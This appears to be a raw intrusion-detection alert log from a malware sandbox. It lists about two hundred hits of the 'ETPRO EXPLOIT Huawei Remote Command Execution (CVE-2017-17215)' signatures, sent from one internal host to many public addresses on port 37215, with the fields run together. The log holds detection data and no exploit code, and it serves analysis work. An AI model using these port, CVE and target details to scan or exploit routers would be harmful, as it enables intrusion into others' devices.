                                                        06/13/24-21:32:23.836097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022037215192.168.2.14156.159.9.247
                                                        06/13/24-21:32:11.506133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754237215192.168.2.14197.110.241.243
                                                        06/13/24-21:33:07.040148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661837215192.168.2.14156.45.149.75
                                                        06/13/24-21:32:32.153578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178637215192.168.2.14197.133.134.39
                                                        06/13/24-21:33:09.091429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356437215192.168.2.14156.159.168.179
                                                        06/13/24-21:33:00.871470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383837215192.168.2.14156.23.152.210
                                                        06/13/24-21:33:13.228636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485437215192.168.2.14156.49.54.8
                                                        06/13/24-21:32:17.675112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007037215192.168.2.1441.221.156.234
                                                        06/13/24-21:32:40.356033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218437215192.168.2.14156.74.55.148
                                                        06/13/24-21:32:48.573578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779037215192.168.2.1441.168.68.240
                                                        06/13/24-21:32:36.269572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751437215192.168.2.14197.206.59.222
                                                        06/13/24-21:33:09.089297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947837215192.168.2.14197.106.195.74
                                                        06/13/24-21:32:54.709782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020437215192.168.2.14156.235.144.34
                                                        06/13/24-21:32:17.679107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442437215192.168.2.1441.158.189.188
                                                        06/13/24-21:32:52.654307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497037215192.168.2.14156.57.193.244
                                                        06/13/24-21:33:15.257263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735037215192.168.2.14156.91.221.54
                                                        06/13/24-21:33:15.256983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378637215192.168.2.14197.148.177.131
                                                        06/13/24-21:33:17.309170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862637215192.168.2.14156.209.75.208
                                                        06/13/24-21:32:40.377196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727837215192.168.2.1441.127.58.71
                                                        06/13/24-21:32:44.478081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104837215192.168.2.1441.44.32.207
                                                        06/13/24-21:33:07.041529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6094437215192.168.2.1441.77.84.81
                                                        06/13/24-21:33:09.085024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088437215192.168.2.14197.17.152.152
                                                        06/13/24-21:32:17.674778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445237215192.168.2.14197.149.70.142
                                                        06/13/24-21:32:21.786207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053237215192.168.2.14197.76.99.244
                                                        06/13/24-21:31:57.092782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823837215192.168.2.14197.164.250.121
                                                        06/13/24-21:32:42.406674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544037215192.168.2.14197.212.174.132
                                                        06/13/24-21:32:50.629070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024637215192.168.2.14156.110.120.169
                                                        06/13/24-21:32:40.377108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494837215192.168.2.1441.130.125.161
                                                        06/13/24-21:32:34.213372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5963837215192.168.2.1441.213.201.97
                                                        06/13/24-21:32:19.731093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425437215192.168.2.14197.169.105.154
                                                        06/13/24-21:33:13.210456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623037215192.168.2.1441.182.83.177
                                                        06/13/24-21:31:57.091479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664637215192.168.2.1441.98.170.196
                                                        06/13/24-21:32:34.217565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299037215192.168.2.1441.47.67.48
                                                        06/13/24-21:32:46.503752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253637215192.168.2.1441.139.87.192
                                                        06/13/24-21:31:59.196283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14156.70.115.159
                                                        06/13/24-21:32:23.833389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019037215192.168.2.1441.85.177.222
                                                        06/13/24-21:32:28.044008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505437215192.168.2.1441.88.226.243
                                                        06/13/24-21:32:01.238840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309437215192.168.2.1441.156.43.198
                                                        06/13/24-21:32:32.150294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690237215192.168.2.14156.60.22.150
                                                        06/13/24-21:33:00.867615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283037215192.168.2.14156.55.29.238
                                                        06/13/24-21:33:02.907277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913437215192.168.2.14197.152.204.115
                                                        06/13/24-21:32:52.678534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221037215192.168.2.14197.94.1.123
                                                        06/13/24-21:32:03.294295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312037215192.168.2.1441.249.78.118
                                                        06/13/24-21:33:00.869528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714837215192.168.2.14156.153.207.135
                                                        06/13/24-21:32:36.269314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866637215192.168.2.14197.64.187.150
                                                        06/13/24-21:33:17.338867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359837215192.168.2.14156.146.219.103
                                                        06/13/24-21:32:19.729758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084837215192.168.2.14156.195.191.106
                                                        06/13/24-21:32:09.457865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014637215192.168.2.14156.160.74.183
                                                        06/13/24-21:32:21.805154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555437215192.168.2.14197.246.118.4
                                                        06/13/24-21:32:34.199817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297237215192.168.2.1441.167.56.193
                                                        06/13/24-21:32:23.943122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060437215192.168.2.14156.90.91.67
                                                        06/13/24-21:32:07.402456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315637215192.168.2.14197.168.143.40
                                                        06/13/24-21:32:42.421926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674437215192.168.2.14197.141.227.194
                                                        06/13/24-21:32:58.823787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319237215192.168.2.14197.100.134.138
                                                        06/13/24-21:33:17.309927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587037215192.168.2.14197.105.107.170
                                                        06/13/24-21:31:57.129811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626237215192.168.2.14156.230.226.221
                                                        06/13/24-21:32:42.405911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4073037215192.168.2.14156.48.128.7
                                                        06/13/24-21:33:02.914722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678437215192.168.2.1441.166.124.116
                                                        06/13/24-21:32:34.213283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334037215192.168.2.14156.73.155.191
                                                        06/13/24-21:32:46.524412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014637215192.168.2.14156.97.77.181
                                                        06/13/24-21:32:46.510171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.1441.97.168.168
                                                        06/13/24-21:32:03.295057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412437215192.168.2.1441.19.210.36
                                                        06/13/24-21:32:52.678381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509037215192.168.2.1441.171.59.11
                                                        06/13/24-21:33:05.016512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542237215192.168.2.1441.181.120.128
                                                        06/13/24-21:32:09.456779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642037215192.168.2.14156.220.52.129
                                                        06/13/24-21:32:15.638319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467437215192.168.2.14197.197.173.222
                                                        06/13/24-21:32:09.440540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708637215192.168.2.14156.228.130.110
                                                        06/13/24-21:32:32.152648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431837215192.168.2.14156.105.133.156
                                                        06/13/24-21:32:54.708990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358837215192.168.2.14156.113.80.115
                                                        06/13/24-21:32:52.676246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095237215192.168.2.1441.94.125.205
                                                        06/13/24-21:32:19.729354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228037215192.168.2.14156.176.147.115
                                                        06/13/24-21:32:46.527835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351837215192.168.2.14156.104.125.170
                                                        06/13/24-21:32:21.802238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194837215192.168.2.1441.87.173.252
                                                        06/13/24-21:32:19.749318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322037215192.168.2.1441.103.110.191
                                                        06/13/24-21:33:04.991505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675837215192.168.2.14197.243.77.38
                                                        06/13/24-21:33:17.338960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654637215192.168.2.14197.70.78.182
                                                        06/13/24-21:32:40.376549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290837215192.168.2.14197.148.141.10
                                                        06/13/24-21:32:48.553662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4487637215192.168.2.1441.157.84.161
                                                        06/13/24-21:33:11.160748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6001437215192.168.2.1441.112.167.169
                                                        06/13/24-21:32:21.804397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939837215192.168.2.14197.85.22.198
                                                        06/13/24-21:32:38.316390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756037215192.168.2.14197.200.153.163
                                                        06/13/24-21:32:09.457845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645837215192.168.2.1441.63.44.127
                                                        06/13/24-21:32:11.487158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391837215192.168.2.1441.103.101.183
                                                        06/13/24-21:33:13.213284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955037215192.168.2.14197.208.50.111
                                                        06/13/24-21:31:57.136334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439237215192.168.2.14197.246.165.36
                                                        06/13/24-21:32:21.805792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822837215192.168.2.1441.79.132.235
                                                        06/13/24-21:32:07.419972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481837215192.168.2.14156.18.50.19
                                                        06/13/24-21:32:09.456656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467237215192.168.2.14197.198.27.36
                                                        06/13/24-21:32:03.277361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267237215192.168.2.14156.252.194.48
                                                        06/13/24-21:33:09.089707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057437215192.168.2.1441.21.36.95
                                                        06/13/24-21:33:13.230994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278237215192.168.2.14197.113.180.145
                                                        06/13/24-21:31:59.197104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562037215192.168.2.14197.74.195.55
                                                        06/13/24-21:32:36.265781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888837215192.168.2.1441.144.196.173
                                                        06/13/24-21:32:40.372818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158637215192.168.2.1441.237.127.151
                                                        06/13/24-21:32:38.315992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180837215192.168.2.14197.186.184.88
                                                        06/13/24-21:32:28.025154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576037215192.168.2.1441.234.63.95
                                                        06/13/24-21:32:44.478339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522037215192.168.2.1441.129.125.173
                                                        06/13/24-21:32:19.730965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431037215192.168.2.14197.102.197.139
                                                        06/13/24-21:32:28.027845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621037215192.168.2.1441.13.117.197
                                                        06/13/24-21:32:30.128503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664437215192.168.2.1441.6.194.139
                                                        06/13/24-21:33:13.213937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806637215192.168.2.1441.171.241.154
                                                        06/13/24-21:32:44.480563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608837215192.168.2.14156.148.29.107
                                                        06/13/24-21:33:00.871519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076437215192.168.2.1441.195.172.41
                                                        06/13/24-21:32:03.279674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680237215192.168.2.14156.104.85.254
                                                        06/13/24-21:31:59.195314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623437215192.168.2.1441.198.252.189
                                                        06/13/24-21:32:25.973790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750637215192.168.2.1441.98.98.4
                                                        06/13/24-21:32:15.610982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017237215192.168.2.1441.203.245.148
                                                        06/13/24-21:32:03.278728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131637215192.168.2.14156.178.110.31
                                                        06/13/24-21:32:34.218173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3358237215192.168.2.14197.9.94.180
                                                        06/13/24-21:32:13.545693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457037215192.168.2.14156.84.102.199
                                                        06/13/24-21:32:40.358470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858037215192.168.2.14156.91.241.57
                                                        06/13/24-21:32:46.502228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705037215192.168.2.14197.129.81.48
                                                        06/13/24-21:33:04.993543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367837215192.168.2.14197.54.110.192
                                                        06/13/24-21:33:04.991905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550037215192.168.2.1441.152.81.144
                                                        06/13/24-21:31:57.135834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813837215192.168.2.1441.194.164.164
                                                        06/13/24-21:32:07.416270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068437215192.168.2.14156.154.54.116
                                                        06/13/24-21:32:38.303244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254037215192.168.2.1441.121.95.22
                                                        06/13/24-21:33:09.102106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027037215192.168.2.1441.3.215.207
                                                        06/13/24-21:32:17.670360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127237215192.168.2.1441.66.162.157
                                                        06/13/24-21:32:36.247603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194837215192.168.2.14156.162.79.31
                                                        06/13/24-21:32:38.300861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.14156.89.152.44
                                                        06/13/24-21:32:23.942166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334237215192.168.2.1441.51.158.38
                                                        06/13/24-21:32:28.026291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297837215192.168.2.14156.222.166.118
                                                        06/13/24-21:32:36.245247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061837215192.168.2.14156.172.46.182
                                                        06/13/24-21:32:03.307323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072437215192.168.2.1441.46.35.167
                                                        06/13/24-21:33:13.211275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678837215192.168.2.14197.115.40.169
                                                        06/13/24-21:32:30.094538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078237215192.168.2.1441.99.244.1
                                                        06/13/24-21:32:46.502877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527437215192.168.2.14156.45.215.51
                                                        06/13/24-21:31:57.092117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459037215192.168.2.14197.143.96.116
                                                        06/13/24-21:32:30.128755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858637215192.168.2.1441.180.170.71
                                                        06/13/24-21:32:40.377149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896437215192.168.2.1441.135.205.205
                                                        06/13/24-21:32:30.124038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659837215192.168.2.1441.163.123.0
                                                        06/13/24-21:32:25.972521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464837215192.168.2.1441.26.207.136
                                                        06/13/24-21:33:11.180963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031637215192.168.2.14197.15.113.207
                                                        06/13/24-21:33:17.305882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790637215192.168.2.14197.241.247.70
                                                        06/13/24-21:32:30.077695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811037215192.168.2.14156.83.76.165
                                                        06/13/24-21:33:04.988584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947637215192.168.2.14197.241.99.113
                                                        06/13/24-21:32:11.509450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724237215192.168.2.14197.135.124.50
                                                        06/13/24-21:32:03.298582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238837215192.168.2.14197.181.128.207
                                                        06/13/24-21:32:19.730934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625037215192.168.2.1441.4.99.9
                                                        06/13/24-21:33:11.175246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690037215192.168.2.14197.179.28.126
                                                        06/13/24-21:33:15.255101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090037215192.168.2.14156.13.81.20
                                                        06/13/24-21:32:42.406731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743637215192.168.2.14197.76.158.29
                                                        06/13/24-21:32:07.403863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028037215192.168.2.14156.190.162.220
                                                        06/13/24-21:32:36.242721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081037215192.168.2.14156.221.230.16
                                                        06/13/24-21:32:56.759124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585237215192.168.2.14156.172.181.201
                                                        06/13/24-21:32:23.834592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551037215192.168.2.1441.255.31.150
                                                        06/13/24-21:32:34.215717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839837215192.168.2.14156.172.200.110
                                                        06/13/24-21:32:19.730374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3461837215192.168.2.1441.25.2.192
                                                        06/13/24-21:33:00.869180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666437215192.168.2.14156.38.0.183
                                                        06/13/24-21:33:15.273734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564437215192.168.2.14197.27.251.47
                                                        06/13/24-21:32:13.544465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324237215192.168.2.14197.188.150.120
                                                        06/13/24-21:31:57.132872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572837215192.168.2.14156.206.99.218
                                                        06/13/24-21:32:40.373011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682237215192.168.2.14156.111.242.219
                                                        06/13/24-21:32:09.439220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538237215192.168.2.14197.116.85.219
                                                        06/13/24-21:32:30.127391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689437215192.168.2.14156.29.123.103
                                                        06/13/24-21:32:52.670837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857237215192.168.2.14156.186.120.241
                                                        06/13/24-21:32:21.805953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534637215192.168.2.14197.90.213.104
                                                        06/13/24-21:32:23.833653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488037215192.168.2.14197.93.99.37
                                                        06/13/24-21:32:34.215754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084237215192.168.2.14197.183.15.31
                                                        06/13/24-21:33:17.308757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950637215192.168.2.14156.234.190.149
                                                        06/13/24-21:32:17.696549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604037215192.168.2.14156.6.101.199
                                                        06/13/24-21:32:36.262891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225437215192.168.2.14197.161.117.196
                                                        06/13/24-21:31:59.198292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4227037215192.168.2.14156.13.175.64
                                                        06/13/24-21:32:23.938746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914837215192.168.2.1441.57.199.132
                                                        06/13/24-21:33:02.937360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405037215192.168.2.14197.48.87.126
                                                        06/13/24-21:32:58.824760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362237215192.168.2.1441.82.206.6
                                                        06/13/24-21:32:58.824945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156037215192.168.2.14197.234.2.128
                                                        06/13/24-21:32:50.632638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920037215192.168.2.14197.80.145.171
                                                        06/13/24-21:33:17.305587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469037215192.168.2.14156.34.84.222
                                                        06/13/24-21:32:58.823944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197237215192.168.2.1441.155.230.69
                                                        06/13/24-21:32:13.564016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440637215192.168.2.14197.17.167.33
                                                        06/13/24-21:32:15.632326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828837215192.168.2.1441.52.154.95
                                                        06/13/24-21:32:58.822178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738437215192.168.2.14197.226.99.181
                                                        06/13/24-21:32:03.277506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091637215192.168.2.14156.38.59.86
                                                        06/13/24-21:32:42.406308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115437215192.168.2.14197.110.79.70
                                                        06/13/24-21:32:25.993862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291637215192.168.2.14156.221.193.223
                                                        06/13/24-21:32:32.154789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693837215192.168.2.1441.182.109.37
                                                        06/13/24-21:32:07.415360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427437215192.168.2.1441.9.172.41
                                                        06/13/24-21:32:13.546832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735037215192.168.2.14197.33.133.247
                                                        06/13/24-21:33:02.913960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3656437215192.168.2.14156.35.59.186
                                                        06/13/24-21:31:59.177533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821637215192.168.2.1441.20.0.38
                                                        06/13/24-21:32:30.076709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775637215192.168.2.14197.33.20.96
                                                        06/13/24-21:33:09.087560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211637215192.168.2.1441.198.25.66
                                                        06/13/24-21:33:00.867313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596237215192.168.2.14197.96.153.204
                                                        06/13/24-21:32:15.632501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658237215192.168.2.14197.166.3.156
